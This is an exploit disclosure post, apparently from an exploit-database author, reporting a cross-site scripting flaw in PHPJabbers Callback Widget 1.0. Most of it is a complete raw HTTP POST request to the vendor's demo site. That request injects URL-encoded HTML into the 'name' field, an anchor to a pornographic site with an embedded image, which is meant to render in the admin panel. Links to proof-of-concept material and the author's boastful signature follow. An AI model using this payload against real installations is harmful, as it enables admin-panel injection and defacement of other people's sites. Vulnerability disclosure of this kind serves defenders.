## Title: PHPJ-Callback-Widget-1.0-XSS-Reflected-admin-Hijacking ## Author: nu11secur1ty ## Date: 01/26/2024 ## Vendor: https://www.phpjabbers.com/ ## Software: https://www.phpjabbers.com/callback-widget/ ## Reference: https://portswigger.net/web-security/cross-site-scripting ## Description: The Callback Requests function is vulnerable to javascript injection. The malicious user from everywhere can send an XSS-Reflected exploit code to the admin panel, and then when the admin visits the API Callback Requests function he will immediately activate the exploitation of the malicious actor. This is so fun, thanks for watching the PoC video. =) BR STATUS: HIGH-Vulnerability [+]Exploit: ```POST POST /1706261102_419/index.php?controller=pjFront&action=pjActionSave HTTP/1.1 Host: demo.phpjabbers.com Cookie: _ga=GA1.2.2069938240.1692907228; _fbp=fb.1.1705479327501.84379277; _ga_NME5VTTGTT=GS1.2.1705493664.10.1.1705493702.22.0.0; CallbackWidget=irnrkmih5bc4ehc7fcgbc8ql84 Content-Length: 322 Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://demo.phpjabbers.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://demo.phpjabbers.com/1706261102_419/preview.php?theme=theme1 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=1, i Connection: close reason_id=2&name=%3Ca+href%3D%22https%3A%2F%2Fwww.pornhub.com%22+target%3D%22_blank%22%3E+%09%3Cimg+src%3D%22https%3A%2F%2Fel.phncdn.com%2Fgif%2F45467111.gif%22+alt%3D%22STUPID%22width%3D%22900%22+height%3D%22450%22%3E+%3C%2Fa%3E&email=hack%40hack.com&phone=1234567890&besttime=30-01-2024+11%3A30&timezone=0&captcha=VIXFWL ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Callback-Widget-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/01/phpj-callback-widget-10-xss-reflected.html) ## Time spent: 00:15:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>